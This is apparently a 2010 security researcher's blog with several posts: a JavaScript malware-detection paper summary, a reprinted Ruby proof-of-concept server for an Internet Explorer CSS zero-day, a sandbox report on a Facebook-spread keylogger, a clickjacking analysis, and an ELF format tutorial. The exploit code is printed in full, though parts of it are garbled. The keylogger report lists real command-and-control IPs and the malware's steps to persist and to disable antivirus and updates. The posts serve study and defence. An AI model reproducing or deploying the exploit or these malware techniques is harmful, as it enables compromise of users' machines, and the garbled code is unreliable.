## Wednesday, December 29, 2010

### Yet Traveling Time.

During next month (almost all January long) I will be traveling around US between conferences and business meetings. I will flight to New York, after few days I'll be in Koloa (Kauai), Los Angeles, Las Vegas and then back to Sac, my second home ;).

For such a reason it will be difficult keeping updated my blog while I'll be traveling. I'll try to do my best, but please be patient if you will not see weekly updates ... Unfortunately I will have only few days (and very busy ones) for each aforementioned place so I cannot organize meetings in Cal as we did last year with SF and SD readers.

This is my last post of the year. Lets me say:

*UPDATE-1*
Today is the last day in New York City. Everything was perfect, thanks to all the friends joined me during the past evenings and to all the ones who got me around the city.

### Zozzle: The Microsoft Answer to Javascript Malware.

Hi Folks,
today I came through this interesting paper entitled: Zozzle: Low-overhead Mostly Static JavaScript Malware Detection. Born in Microsoft Research Laboratories seems to be a very promising Anti Static Javascript Malware Detection. It should run in background checking if in the browsed page there are traces of javascript malware.

Abstract:
JavaScript malware-based attacks account for a large fraction of successful mass-scale exploitation happeningtoday. From the standpoint of the attacker, the attraction is that these drive-by attacks that can be mounted against an unsuspecting user visiting a seemingly innocent webpage. While several techniques for addressing these types of exploits have been proposed, in browser adoption has been slow, in part because of the performance overhead these methods tend to incur.

In this paper, we propose ZOZZLE, a low-overhead solution for detecting and preventing JavaScript malware that can be deployed in the browser. Our approach uses Bayesian classification of hierarchical features of the JavaScript abstract syntax tree to identify syntax elements that are highly predictive of malware. Our extensive experimental evaluation shows that ZOZZLE is able to effectively detect JavaScript malware through mostly static code analysis with very low false positive rates (fractions of 1%), and with a typical overhead of only 2-5 milliseconds per JavaScript file. Our experience also suggests that ZOZZLE may be used as a lightweight filter for a more costly detection technique or for standalone offline malware detection.

Some interesting results:

discovering more exploit samples over time. The x axis shows the number of examined malware samples, the y axis shows the number of unique ones.

Transience of detected malicious URLs after several days. The number of days is shown of the x axis, the percentage of remaining malware is shown on the y axis.

Even if this study is based on preliminary results, and even if in the real life analyzing dynamically Javascript could be time and resource consuming, I think the results they got are very interesting and worthy of being followed. To know more about Zoozle please read the full paper.

## Tuesday, December 28, 2010

### Splitting the HTTPS Stream to Attack Secure Web Connections

Folks,

IEEE Security and Privacy published an article that my group and I wrote some months ago, it's titled : Splitting the HTTPS Stream to Attack Secure Web Connections. You can find it here, check it out !

Abstract:
The HTTPS protocol is commonly adopted to secure connections to websites, both to guarantee the server's authenticity and to protect the privacy of transmitted data. However, the computational load associated with the protocol's key exchange and encryption/decryption activities isn't negligible. Many trafficked websites must avoid using HTTPS for most of their pages, typically restricting its usage only to encrypting sensitive user data. This article illustrates how this common practice significantly reduces the possibility of detecting manipulations of the data stream by the client, thus exposing the user to potential man-in-the-middle attacks.

## Thursday, December 23, 2010

### Internet Explorer CSS 0Day. Exploit released.

Hi folks,
yes even on my notes the new Internet Explorer (on windows 7) 0Day. It's a nice piece of work.

What let me astonished is the exploit release which came before the Microsoft patch.
Here the exploit is:

#!/usr/bin/env ruby

# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)

require 'socket'

def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
opts = defaults.merge(opts)

code = opts[:code]
message = opts[:message]
type = opts[:type]

to_send = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
"Cache-Control: no-cache\r\n" +
"Content-Type: #{type}\r\n" +
"Pragma: no-cache\r\n" +
"Content-Length: #{data.length}\r\n\r\n" +
"#{data}"
puts "[+] Sending:"
to_send.split("\n").each do |line|
puts " #{line}"
end
sock.write(to_send) rescue return false
return true
end

begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
out_str.split("\n").each do |line|
puts " #{line}"
end
else
sock.close
return false
end
rescue Exception => ex
return false
end
end

def to_uni(str)
res = ""
str.each_byte do |b|
res << "\x00#{b.chr}" end res end @css_name = "\x00s\x03s\x00s\x03s\x00s\x03s\x00s\x03s" @html_name = "test.html" placeholder = "a" * (@css_name.length/2) @html = <<-HTML HTML @html = "\xfe\xff" + to_uni(@html) @html.gsub!(to_uni(placeholder), @css_name) @css = <<-CSS @import url("#{placeholder}"); @import url("#{placeholder}"); @import url("#{placeholder}"); @import url("#{placeholder}"); CSS @css = "\xfe\xff" + to_uni(@css) @css.gsub!(to_uni(placeholder), @css_name) @index = <<-INDEX #{@html_name} INDEX TCPServer.open(55555) do |srv| while true cli = srv.accept req = "" html = "" css = "" index = "" next unless sock_read(cli, req, 5) while req.length > 0
if req =~ /GET/
if req =~ /GET.*#{Regexp.escape(@html_name)}/
break unless http_send(cli, @html, :type=>"text/html")
elsif req =~ /GET.*index/
break unless http_send(cli, @index)
elsif req =~ /GET.*#{Regexp.escape(@css_name)}/
break unless http_send(cli, @css, :type=>"text/css")
else
break unless http_send(cli, @css, :type=>"text/css")
end
elsif req =~ /QUIT/
exit()
end
req = ""
end
cli.close rescue next
end
end

Which basically implements a server who sends back to clients the following page:

It's a really good job, but couldn't wait the patch release before ?
I still need to suggest to switch from IE to Safari or to Firefox without 3-parties plugins.

## Wednesday, December 22, 2010

### Working Capital Tour

My first and probably last pitch session. Working Capital Tour, Rome 2010.

Why using pitch sessions ? Because who listens you cannot stay focused more then 5 minutes..... poor guy.... why don't you try to improve your metal abilities before trying to listen somebody ? ;)

## Monday, December 20, 2010

Thanks to CeSeNA group and to Luca Mella (one of the organizers of CeSeNA), I found out a nice example (in terms of ... "a didactical one" ) of Malware (keylogger) which explains how attackers might use social networks to spread new generation of Malware.

Everything starts from a friend who sends to you a link. In the specific case the link was: http://www.facebook.com/l.php?u=www.acoplasticos.org%2Fcrm. Opening the link a nice trap asks to click on a "button" which executes a fake image. (An executable file) called: image96523489.exe .

If the attacked user clicks on it, it executes 2 processes: The current Browser (in a safe mode) and a backgrounded program called vnsvc32.exe, which is the actual real Malware.

The first action performed by vnsvc32.exe is to copy itself and other two files on the "private win" folders: C:\windows\nvsvc32.exe, C:\windows\wibrf.jpg and C:\windows\wiybr.png.

It adds AutoStart registry's entries in: machine\software\microsoft\Windows\CurrentVersion\Run\NVIDIA driver monitor = c:\windows\nvsvc32.exe, in machine\software\microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\NVIDIA driver monitor = c:\windows\nvsvc32.exe, in machine\system\CurrentControlSet\Services\wuauserv\Start = 04000000 and in other secondary location.
It changes internet explorer entries such as: software\microsoft\internet explorer\main, user\current\software\Microsoft\Internet Explorer\Toolbar\Locked = 01000000 and user\current\software\Microsoft\Windows\CurrentVersion\Run\NVIDIA driver monitor = c:\windows\nvsvc32.exe.

Some DNS queries:

Query DNS: astro.ic.ac.uk
Query DNS: ale.pakibili.com
Query DNS: versatek.com
Query DNS: journalofaccountancy.com
Query DNS: transnationale.org
Query DNS: browseusers.myspace.com
Query DNS: mas.0730ip.com
Query DNS: www.myspace.com
Query DNS: ds.phoenix-cc.net
Query DNS: stayontime.info
Query DNS: www.shearman.com
Query DNS: insidehighered.com
Query DNS: ate.lacoctelera.net
Query DNS: websitetrafficspy.com
Query DNS: qun.51.com
Query DNS: x.myspacecdn.com
Query DNS: summer-uni-sw.eesp.ch
Query DNS: shopstyle.com
Query DNS: xxx.stopklatka.pl
Query DNS: xxx.stopklatka.pl.localdomain

And of course internet connections.

Connects to "63.135.80.224" on port 80 (TCP - HTTP).
Connects to "63.135.80.46" on port 80 (TCP - HTTP).
Connects to "46.40.191.11" on port 80 (TCP - HTTP).
Connects to "66.220.158.18" on port 80 (TCP - HTTP).
Connects to "174.37.200.82" on port 80 (TCP - HTTP).

From those address the Malware downloads the actual core of the malware (also known as payload) coping it over different processes and folders on the attacked machine. But this is not really interesting.

Connects to "205.234.253.15" on port 1234 (TCP).
This action seems to be much more interesting. By opening-it, using a normal web browser we see t non "over HTTP" communication.

Analyzing the communication layer and querying the DNS authority, it comes out the used communication protocol: FTP.

This is a classic example of how social medias could be used to spread Malware. First the attacker asks your friendship ... most of the time if a nice girl or a good looking man that you probably might have known in some places, but you do not remember at all, asks your friendship you give it. Probably for kindness or to be sure to don't be an ass hole. Second, after the attacker is in your friendship community he waits some time just to mitigate the friendship. After time he sends to you a link, by creating a private message or posting on your wall or just adding a news feed. You do not remember who is him but since he's in your friendship area you trust him. Here comes the real trick. You didn't remember him when he asked your friendship, and probably if immediately after his request he would sent to you a link you probably did not trust him. But after some time you forgot that you didn't trust him. So you trust him because you assume that who is in your friendship network is a friend and for such a reason trusted. You open the link and you become infected.

Yes, keylogging activity is complicated. You need to hack several websites in order to upload the payload and the malware, you need to hack an FTP server, you need to write a good payload that antivirus don't detect, you need to force and to spread everything around the world.. I mean it's a job ! But all the technology falls down if compared to social engineering techniques. Most of the time Social Engineering is the most powerful attacker's weapon. Protecting from it means protecting from most of the complicated and mad attacking technology.

Following a detailed report on the Malware:

[ General information ]
* File name: c:\documents and settings\administrator\desktop\image96523489.exe
* File length: 65024 bytes
* File signature: Microsoft Visual C++ 7.0
* MD5 hash: 085ecb8b600c3b4b105674ed27cdcbaf
* SHA1 hash: 5c20fe20a5f0a86d1b0455f8d20299dfe583b30b
* SHA256 hash: f2a17d30d9e921fdc9e0d7f927f20c8820869552d8ba1cfa5f7fbc68d64f970a

[ Changes to filesystem ]
* Creates file C:\windows\ndl.dl
* Creates file (hidden) C:\windows\nvsvc32.exe
* Creates file (hidden) C:\windows\wibrf.jpg
* Creates file (hidden) C:\windows\wiybr.png
* Creates file C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012010121320101220\index.dat
* Creates file C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012010122020101221\index.dat
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\F7YBJYVW\bg_browserSection[1].jpg
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\F7YBJYVW\browserunsupported[1].htm
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JRQBGGX3\icon_information[1].gif
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JRQBGGX3\index[4].htm
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LPI195Q5\bg_infobox[1].jpg
* Creates file C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LPI195Q5\browserLogos_med[1].jpg

[ Changes to registry ]
* Creates value "FileTracingMask=0000FFFF" in key HKEY_LOCAL_MACHINE\software\microsoft\Tracing\FWCFG
* Creates value "ConsoleTracingMask=0000FFFF" in key HKEY_LOCAL_MACHINE\software\microsoft\Tracing\FWCFG
* Creates value "MaxFileSize=00001000" in key HKEY_LOCAL_MACHINE\software\microsoft\Tracing\FWCFG
* Creates value "FileDirectory=2500770069006E0064006900720025005C00740072006100630069006E0067000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Tracing\FWCFG
* Creates value "NVIDIA driver monitor=c:\windows\nvsvc32.exe" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Run
* Creates value "NVIDIA driver monitor=c:\windows\nvsvc32.exe" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
* Creates value "LogSessionName=7300740064006F00750074000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh
* Creates value "Active=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh
* Creates value "ControlFlags=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh
* Creates value "BitNames= NAP_TRACE_BASE NAP_TRACE_NETSH" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr
* Creates value "LogSessionName=7300740064006F00750074000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent
* Creates value "Active=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent
* Creates value "ControlFlags=01000000" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent
* Creates value "Guid=b0278a28-76f1-4e15-b1df-14b209a12613" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier
* Creates value "BitNames= Error Unusual Info Debug" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier
* Creates Registry key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\napagent\LocalConfig\Enroll\HcsGroups
* Creates Registry key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\napagent\LocalConfig\UI
* Creates value "image96523489.exe=c:\windows\nvsvc32.exe:*:Enabled:NVIDIA driver monitor" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrator\Desktop
* Modifies value "Start=00000004" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\wuauserv
old value "Start=00000002"
* Modifies value "Window_Placement=2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF62000000920000005903000041030000" in key HKEY_CURRENT_USER\software\Microsoft\Internet Explorer\Main
old value "Window_Placement=2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFA00000000000000097030000AF020000"
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
* Modifies value "HRZR_PGYFRFFVBA=10015D0E14000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count
old value "HRZR_PGYFRFFVBA=FDED5C0E13000000"
* Modifies value "Count=00000010" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore
old value "Count=0000000F"
* Modifies value "Time=DA070C000100140008002A0022006C00" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore
old value "Time=DA070C0005001100070037003000A802"
* Modifies value "Count=00000010" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore
old value "Count=0000000F"
* Modifies value "Time=DA070C000100140008002A0022007C00" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore
old value "Time=DA070C0005001100070037003000A802"
* Creates value "CachePath=25005500530045005200500052004F00460049004C00450025005C004C006F00630061006C002000530065007400740069006E00670073005C0048006900730074006F00720079005C0048006900730074006F00720079002E004900450035005C004D00530048006900730074003000310032003000310030003100320031003300320030003100300031003200320030005C000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121320101220
* Creates value "CachePrefix=:2010121320101220: " in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121320101220
* Creates value "CacheLimit=00200000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121320101220
* Creates value "CacheOptions=0B000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121320101220
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121420101215
* Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010121620101217
* Creates value "CachePath=25005500530045005200500052004F00460049004C00450025005C004C006F00630061006C002000530065007400740069006E00670073005C0048006900730074006F00720079005C0048006900730074006F00720079002E004900450035005C004D00530048006900730074003000310032003000310030003100320032003000320030003100300031003200320031005C000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010122020101221
* Creates value "CachePrefix=:2010122020101221: " in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010122020101221
* Creates value "CacheLimit=00200000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010122020101221
* Creates value "CacheOptions=0B000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012010122020101221
* Modifies value "SavedLegacySettings=3C00000020000000010000000000000000000000000000000400000000000000A0C4FAAF62D0CA0101000000AC10268B0000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
old value "SavedLegacySettings=3C0000001E000000010000000000000000000000000000000400000000000000A0C4FAAF62D0CA0101000000AC10268B0000000000000000"
* Creates value "NVIDIA driver monitor=c:\windows\nvsvc32.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run
* Modifies value "MRUListEx=02000000010000000800000016000000170000000F0000000D0000001500000014000000130000001200000010000000110000000300000000000000050000000E0000000C0000000B0000000A00000009000000070000000600000004000000FFFFFFFF" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\BagMRU
old value "MRUListEx=01000000020000000800000016000000170000000F0000000D0000001500000014000000130000001200000010000000110000000300000000000000050000000E0000000C0000000B0000000A00000009000000070000000600000004000000FFFFFFFF"
* Modifies value "WinPos1286x734(1).left=00000062" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell
old value "WinPos1286x734(1).left=000000A0"
* Modifies value "WinPos1286x734(1).top=00000092" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell
old value empty
* Modifies value "WinPos1286x734(1).right=00000359" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell
old value "WinPos1286x734(1).right=00000397"
* Modifies value "WinPos1286x734(1).bottom=00000341" in key HKEY_CURRENT_USER\software\Microsoft\Windows\ShellNoRoam\Bags\8\Shell
old value "WinPos1286x734(1).bottom=000002AF"
* Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox

[ Network services ]
* Looks for an Internet connection.
* Backdoor functionality on port 0.
* Queries DNS astro.ic.ac.uk
* Queries DNS ale.pakibili.com
* Queries DNS versatek.com
* Queries DNS journalofaccountancy.com
* Queries DNS transnationale.org
* Queries DNS browseusers.myspace.com
* Queries DNS mas.0730ip.com
* Queries DNS www.myspace.com
* Queries DNS ds.phoenix-cc.net
* Queries DNS stayontime.info
* Queries DNS www.shearman.com
* Queries DNS insidehighered.com
* Queries DNS ate.lacoctelera.net
* Queries DNS websitetrafficspy.com
* Queries DNS qun.51.com
* Queries DNS x.myspacecdn.com
* Queries DNS summer-uni-sw.eesp.ch
* Queries DNS shopstyle.com
* Queries DNS xxx.stopklatka.pl
* Queries DNS xxx.stopklatka.pl.localdomain
* Connects to "63.135.80.224" on port 80 (TCP - HTTP).
* Connects to "63.135.80.46" on port 80 (TCP - HTTP).
* Connects to "205.234.253.15" on port 1234 (TCP).
* Connects to "46.40.191.11" on port 80 (TCP - HTTP).
* Connects to "66.220.158.18" on port 80 (TCP - HTTP).
* Connects to "174.37.200.82" on port 80 (TCP - HTTP).
* Opens next URLs:
http://174.37.200.82/index.php

[ Process/window information ]
* Keylogger functionality.
* Creates process "(null),net stop ,(null)".
* Injects code into process "net.exe".
* Creates a mutex "SHIMLIB_LOG_MUTEX".
* Creates an event named "DINPUTWINMM".
* Creates an event named "Global\userenv: User Profile setup event".
* Creates process "(null),net1 stop ,(null)".
* Injects code into process "net1.exe".
* Creates process "(null),C:\Documents and Settings\Administrator\Desktop\image96523489.exe,(null)".
* Injects code into process "image96523489.exe".
* Creates an event named "Global\crypt32LogoffEvent".
* Creates a mutex "Nvidia Drive Mon".
* Creates a mutex "_!MSFTHISTORY!_".
* Creates a mutex "c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!".
* Creates process "(null),netsh firewall add allowedprogram 1.exe 1 ENABLE,(null)".
* Creates process "c:\windows\nvsvc32.exe,(null),c:\windows".
* Creates process "(null),explorer.exe http://browseusers.myspace.com/Browse/Browse.aspx,(null)".
* Injects code into process "explorer.exe".
* Opens a service named "ShellHWDetection".
* Creates process "(null),C:\windows\nvsvc32.exe,(null)".
* Injects code into process "nvsvc32.exe".
* Injects code into process "iexplore.exe".
* Creates a mutex "Shell.CMruPidlList".
* Creates process "(null),net stop wuauserv,(null)".
* Creates a mutex "RasPbFile".
* Creates a mutex "ZonesCounterMutex".
* Creates a mutex "ZonesCacheCounterMutex".
* Creates a mutex "ZonesLockedCacheCounterMutex".
* Creates process "(null),net stop MsMpSvc,(null)".
* Enumerates running processes.
* Creates process "(null),sc config wuauserv start= disabled,(null)".
* Opens a service named "RASMAN".
* Creates process "(null),sc config MsMpSvc start= disabled,(null)".
* Injects code into process "sc.exe".
* Creates process "(null),net1 stop wuauserv,(null)".
* Creates process "(null),net1 stop MsMpSvc,(null)".
* Opens a service named "wuauserv".
* Opens a service named "MsMpSvc".
* Lists all entry names in a remote access phone book.
* Injects code into process "netsh.exe".
* Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1078081533-1677128483-1801674531-500".
* Opens a service named "NapAgent".
* Creates a mutex "_!SHMSFTHISTORY!_".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!mshist012010121420101215!".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!mshist012010121320101220!".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!mshist012010121620101217!".
* Creates a mutex "c:!documents and settings!administrator!local settings!history!history.ie5!mshist012010122020101221!".
* Creates a mutex "HGFSMUTEX".
* Opens a service named "WebClient".
* Creates a mutex "Global\winlogon: Logon UserProfileMapping Mutex".
* Creates a mutex "_SHuassist.mtx".
* Opens a service named "AudioSrv".
* Creates a mutex "MidiMapper_modLongMessage_RefCnt".
* Creates a mutex "MidiMapper_Configure".

## Friday, December 17, 2010

### My First Book.

Alright,
most of my readers know that I am writing a book. That's true. It has been asked to me to write a book on security. It's a huge process, really believe me... I would never have believed in how much work it is....

Yesterday on amazon.com appeared a book titled "Designing A New Electronic Voting System: Towards electronic voting systems" within my name on it.

This is not the book I am talking about (as many of you emailed me). This is just an old publication of mine, that suddenly became a book ... (with my permission of course).

You might say, alright Marco, so what's this blog post about? This blog post is to underline and to make public that this is not the book on security that I am preparing, so stay tuned it could appear soon ;)

## Tuesday, December 14, 2010

### FaceBook ClickJacking: A Deep analysis on the Sexy Girl.

This afternoon I found out on my news feed this post:"A sexy girl is playing with the Nintendo Wii.. lets see what happened next !''. I was pretty curios to click on it because I knew this Social Engineering Trap. It is a classical one ;).

So lets click on it using a right click and save the link on memory. Then paste the grabbed Link on a empty browser url and lets go there seeing what will happen ! The crafted page seems very very close to the orignal youtube one, except for the URL (of course! )

If you go to its address (http://www.assurdo.info/w/wii.php) you can easily find some inconsistencies for example: the loading bar appears to be half loaded as soon as you open the attack's link, the commands (Play, Stop, Pause) dont work at all (of course it's a simple image!) and an unusual sentence says: "To play the video click Here". Here we go... another clickjacking site ! I've already wrote about clickjacking in several forums, blogs etc. But if you are not familiar with this technique please read my last paper on this topic here.

Right click on the page and ..... a Javascript is disabling the right click on it, obviously they don't want that we read their code ;). Using the browser capability lets see what the attacker wrote into such a page. The following image describes the first half of the page code. A google Analytics account (UA-18918796-1) is present on the page. The attacker wants to keep tracking on how many people has been clickjacked through his page. A CSS page called "foglio.css" links to external source. Investigating foglio.css we see the page manipulation that happens, as usual, using z-index and opacity parameters, nothing really new.

Following the main HTML code, we meet the core of the attack. The following image describes the second half of the page.
A classic iFrame is used to hide the backgrounded page. I made the same example at DEISNET page, please take a look to them to fully understand how the iFrame hides the backgrounded page.

The most interesting stuff comes from the external Javascript called awe.js. Basically the page intercepts your click, using the fake button "Play" placed in the middle of the screen, triggering the javascript code. Such a code controls if you have already visited the following page (http://bit.ly/fCT54Z), which translated after 3 steps becomes a simple registration form of mymatch. If you had already visited it does nothing, if you had not visited the page it makes you visit it and then it builds a cookies to avoid you visit the page another time. This prevents that google or other advertisement companies think that somebody is attacking the adv services using http proxy.

This trick is widely used in the underground communities to obtain fake clicks to get money from pay-per-click services. The script per-se does nothing bad at all to the attacked user, but it forces you to open a page generating traffic, clicks and page impressions on a URL where you wont click on it. Google and other advertisement companies recognize the click behavior and this techniques is the most used way to fake those services, since the click behavior is not altered from the usual one, respecting the normal click behavior stats.

So if you fall into this attack don't worry, you don't need to change password, you have contributed to a click fraud.

A possible way to counterattack is to make several click on the link the attacker used (http://bit.ly/fCT54Z). By voluntary clicking on it you will change the "normal clicking behavior" which means Google and other adv services will close the attacker adv account. Now is up to you ;)

## Thursday, December 9, 2010

Hi Folks,
after the previous post on Windows COFF; namely Microsoft PE, this post comes natural. Today I am going to write some sketches of mine on Executable and Linking Format (ELF). ELF was originally developed by UNIS System Laboratories (USL) as part of the big Application Binary Interface. It has been selected by Tool Interface Standards commission as a portable file format working on 32-bit Intel Architecture.

ELF is structured as follows (click to make it bigger):

An ELF header resides at the beginning and holds a ‘‘road map’’ describing the file’s organization. Sections
hold the bulk of object file information for the linking view: instructions, data, symbol table, relocation information, and so on. Descriptions of special sections appear later in Part 1. Part 2 discusses segments and the program execution view of the file. A program header table, if present, tells the system how to create a process image. Files used to build a processimage (execute a program) must have a program header table; relocatable files do not need one. A
section header table contains information describing the file’s sections. Every section has an entry in the table; each entry gives information such as the section name, the section size, etc. Files used during linking must have a section header table; other object files may or may not have one.

Being very quickly and dirty on the header description we can say that some object file control structures can grow, because the ELF header contains their actual sizes. If the object file format changes, a program may encounter control structures that are larger or smaller than expected. The ELF Header is structured as follows (click to make it bigger) :

e_ident: The initial bytes mark the file as an object file and provide machine-independent data with which to decode and interpret the file’s contents. Complete descriptions appear below, in ‘‘ELF Identification.’’

e_type: This member identifies the object file type.

e_machine: This member’s value specifies the required architecture for an individual file.

e_version: This member identifies the object file version (The value 1 signifies the original file format; extensions will create new versions with higher numbers.)

e_entry: This member gives the virtual address to which the system first transfers control, thus starting the process. If the file has no associated entry point, this member holds zero.

e_phoff: This member holds the program header table’s file offset in bytes. If the file has no program header table, this member holds zero.

e_shoff: This member holds the section header table’s file offset in bytes. If the file has no section header table, this member holds zero.

e_flags: This member holds processor-specific flags associated with the file. Flag names take the form EF_machine_flag. See ‘‘Machine Information’’ for flag definitions.

e_ehsize: This member holds the ELF header’s size in bytes.

e_phentsize: This member holds the size in bytes of one entry in the file’s program header table; allentries are the same size.

e_phnum: This member holds the number of entries in the program header table. Thus the product of e_phentsize and e_phnum gives the table’s size in bytes. If a file has no program
header table, e_phnum holds the value zero.

e_shentsize: This member holds a section header’s size in bytes. A section header is one entry in the section header table; all entries are the same size.

e_shnum: This member holds the number of entries in the section header table. Thus the product of e_shentsize and e_shnum gives the section header table’s size in bytes. If a filehas no section header table, e_shnum holds the value zero.

Alright, this was kind of cool, but how can we play with that ? First of all how can we know that a file is an ELF ? And how can we extract data and information from an ELF file ? Is there something like PEdit ?

Lets start with the following example "test.c" ($gcc -o test test.c):$ readelf -h test Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Intel 80386 Version: 0x1 Entry point address: 0x80482c0 Start of program headers: 52 (bytes into file) Start of section headers: 2060 (bytes into file) Flags: 0x0 Size of this header: 52 (bytes) Size of program headers: 32 (bytes) Number of program headers: 7 Size of section headers: 40 (bytes) Number of section headers: 28 Section header string table index: 25

What does this header tell us?

1) This executable is created for Intel x86 32 bit architecture ("machine" and "class" fields).

2) When executed, program will start running from virtual address 0x80482c0 (see entry point address). The "0x" prefix here means it is a hexadecimal number. This address doesn't point to our main() procedure, but to a procedure named _start. Never felt you had created such thing? Of course you don't. _start procedure is created by the linker whose purpose is to initialize your program.

3) This program has a total of 28 sections and 7 segments.

What is section? Section is an area in the object file that contains information which is useful for linking: program's code, program's data (variables, array, string), relocation information and other. So, in each area, several information is grouped and it has a distinct meaning: code section only hold code, data section only holds initialized or non-initialized data, etc. Section Header Table (SHT) tells us exactly what sections the ELF object has, but at least by looking on "Number of section headers" field above, you can tell that "test" contains 28 sections.

